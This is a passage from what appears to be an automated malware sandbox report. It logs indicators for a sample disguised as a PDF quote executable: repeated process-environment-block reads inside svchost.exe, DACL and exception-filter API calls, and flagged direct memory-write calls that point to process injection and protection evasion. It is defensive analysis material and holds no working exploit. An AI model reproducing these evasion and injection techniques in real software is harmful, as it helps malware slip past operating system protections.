            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C5ED mov eax, dword ptr fs:[00000030h]1_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C5ED mov eax, dword ptr fs:[00000030h]1_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6500 mov eax, dword ptr fs:[00000030h]1_2_039C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938550 mov eax, dword ptr fs:[00000030h]1_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938550 mov eax, dword ptr fs:[00000030h]1_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA49A mov eax, dword ptr fs:[00000030h]1_2_039EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039644B0 mov ecx, dword ptr fs:[00000030h]1_2_039644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BA4B0 mov eax, dword ptr fs:[00000030h]1_2_039BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039364AB mov eax, dword ptr fs:[00000030h]1_2_039364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039304E5 mov ecx, dword ptr fs:[00000030h]1_2_039304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]1_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]1_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]1_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]1_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]1_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]1_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C427 mov eax, dword ptr fs:[00000030h]1_2_0392C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA456 mov eax, dword ptr fs:[00000030h]1_2_039EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392645D mov eax, dword ptr fs:[00000030h]1_2_0392645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395245A mov eax, dword ptr fs:[00000030h]1_2_0395245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]1_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]1_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]1_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC460 mov ecx, dword ptr fs:[00000030h]1_2_039BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940BBE mov eax, dword ptr fs:[00000030h]1_2_03940BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940BBE mov eax, dword ptr fs:[00000030h]1_2_03940BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E4BB0 mov eax, dword ptr fs:[00000030h]1_2_039E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E4BB0 mov eax, dword ptr fs:[00000030h]1_2_039E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DEBD0 mov eax, dword ptr fs:[00000030h]1_2_039DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]1_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]1_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]1_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]1_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]1_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]1_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]1_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]1_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]1_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EBFC mov eax, dword ptr fs:[00000030h]1_2_0395EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCBF0 mov eax, dword ptr fs:[00000030h]1_2_039BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EB20 mov eax, dword ptr fs:[00000030h]1_2_0395EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EB20 mov eax, dword ptr fs:[00000030h]1_2_0395EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8B28 mov eax, dword ptr fs:[00000030h]1_2_039F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8B28 mov eax, dword ptr fs:[00000030h]1_2_039F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DEB50 mov eax, dword ptr fs:[00000030h]1_2_039DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E4B4B mov eax, dword ptr fs:[00000030h]1_2_039E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E4B4B mov eax, dword ptr fs:[00000030h]1_2_039E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6B40 mov eax, dword ptr fs:[00000030h]1_2_039C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6B40 mov eax, dword ptr fs:[00000030h]1_2_039C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FAB40 mov eax, dword ptr fs:[00000030h]1_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D8B42 mov eax, dword ptr fs:[00000030h]1_2_039D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392CB7E mov eax, dword ptr fs:[00000030h]1_2_0392CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968A90 mov edx, dword ptr fs:[00000030h]1_2_03968A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04A80 mov eax, dword ptr fs:[00000030h]1_2_03A04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938AA0 mov eax, dword ptr fs:[00000030h]1_2_03938AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938AA0 mov eax, dword ptr fs:[00000030h]1_2_03938AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986AA4 mov eax, dword ptr fs:[00000030h]1_2_03986AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930AD0 mov eax, dword ptr fs:[00000030h]1_2_03930AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964AD0 mov eax, dword ptr fs:[00000030h]1_2_03964AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964AD0 mov eax, dword ptr fs:[00000030h]1_2_03964AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]1_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]1_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]1_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396AAEE mov eax, dword ptr fs:[00000030h]1_2_0396AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396AAEE mov eax, dword ptr fs:[00000030h]1_2_0396AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCA11 mov eax, dword ptr fs:[00000030h]1_2_039BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954A35 mov eax, dword ptr fs:[00000030h]1_2_03954A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954A35 mov eax, dword ptr fs:[00000030h]1_2_03954A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA24 mov eax, dword ptr fs:[00000030h]1_2_0396CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EA2E mov eax, dword ptr fs:[00000030h]1_2_0395EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940A5B mov eax, dword ptr fs:[00000030h]1_2_03940A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940A5B mov eax, dword ptr fs:[00000030h]1_2_03940A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039ACA72 mov eax, dword ptr fs:[00000030h]1_2_039ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039ACA72 mov eax, dword ptr fs:[00000030h]1_2_039ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]1_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]1_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA6F mov eax, dword ptr fs:[00000030h]1_2_0396CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DEA60 mov eax, dword ptr fs:[00000030h]1_2_039DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89B3 mov esi, dword ptr fs:[00000030h]1_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89B3 mov eax, dword ptr fs:[00000030h]1_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B89B3 mov eax, dword ptr fs:[00000030h]1_2_039B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039429A0 mov eax, dword ptr fs:[00000030h]1_2_039429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039309AD mov eax, dword ptr fs:[00000030h]1_2_039309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039309AD mov eax, dword ptr fs:[00000030h]1_2_039309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393A9D0 mov eax, dword ptr fs:[00000030h]1_2_0393A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039649D0 mov eax, dword ptr fs:[00000030h]1_2_039649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA9D3 mov eax, dword ptr fs:[00000030h]1_2_039FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C69C0 mov eax, dword ptr fs:[00000030h]1_2_039C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039629F9 mov eax, dword ptr fs:[00000030h]1_2_039629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039629F9 mov eax, dword ptr fs:[00000030h]1_2_039629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE9E0 mov eax, dword ptr fs:[00000030h]1_2_039BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC912 mov eax, dword ptr fs:[00000030h]1_2_039BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928918 mov eax, dword ptr fs:[00000030h]1_2_03928918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03928918 mov eax, dword ptr fs:[00000030h]1_2_03928918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE908 mov eax, dword ptr fs:[00000030h]1_2_039AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE908 mov eax, dword ptr fs:[00000030h]1_2_039AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B892A mov eax, dword ptr fs:[00000030h]1_2_039B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C892B mov eax, dword ptr fs:[00000030h]1_2_039C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B0946 mov eax, dword ptr fs:[00000030h]1_2_039B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4978 mov eax, dword ptr fs:[00000030h]1_2_039D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D4978 mov eax, dword ptr fs:[00000030h]1_2_039D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC97C mov eax, dword ptr fs:[00000030h]1_2_039BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]1_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]1_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03956962 mov eax, dword ptr fs:[00000030h]1_2_03956962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E mov eax, dword ptr fs:[00000030h]1_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E mov edx, dword ptr fs:[00000030h]1_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0397096E mov eax, dword ptr fs:[00000030h]1_2_0397096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC89D mov eax, dword ptr fs:[00000030h]1_2_039BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930887 mov eax, dword ptr fs:[00000030h]1_2_03930887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E8C0 mov eax, dword ptr fs:[00000030h]1_2_0395E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C8F9 mov eax, dword ptr fs:[00000030h]1_2_0396C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C8F9 mov eax, dword ptr fs:[00000030h]1_2_0396C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FA8E4 mov eax, dword ptr fs:[00000030h]1_2_039FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC810 mov eax, dword ptr fs:[00000030h]1_2_039BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov ecx, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03952835 mov eax, dword ptr fs:[00000030h]1_2_03952835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A830 mov eax, dword ptr fs:[00000030h]1_2_0396A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D483A mov eax, dword ptr fs:[00000030h]1_2_039D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D483A mov eax, dword ptr fs:[00000030h]1_2_039D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960854 mov eax, dword ptr fs:[00000030h]1_2_03960854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934859 mov eax, dword ptr fs:[00000030h]1_2_03934859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934859 mov eax, dword ptr fs:[00000030h]1_2_03934859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03942840 mov ecx, dword ptr fs:[00000030h]1_2_03942840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE872 mov eax, dword ptr fs:[00000030h]1_2_039BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE872 mov eax, dword ptr fs:[00000030h]1_2_039BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6870 mov eax, dword ptr fs:[00000030h]1_2_039C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6870 mov eax, dword ptr fs:[00000030h]1_2_039C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03962F98 mov eax, dword ptr fs:[00000030h]1_2_03962F98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03962F98 mov eax, dword ptr fs:[00000030h]1_2_03962F98
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CF80 mov eax, dword ptr fs:[00000030h]1_2_0396CF80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04FE7 mov eax, dword ptr fs:[00000030h]1_2_03A04FE7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392EFD8 mov eax, dword ptr fs:[00000030h]1_2_0392EFD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392EFD8 mov eax, dword ptr fs:[00000030h]1_2_0392EFD8
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00EB81D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00EB81D4
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E8A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00E8A2D5
            Source: C:\Users\user\Desktop\quote894590895pdf.exeCode function: 0_2_00E8A2A4 SetUnhandledExceptionFilter,0_2_00E8A2A4

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\BWdPerWEDfSfzqnhBURQLUOsOuiLOksBUCLlsdgjCatCn\csDaoUagQFfwf.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
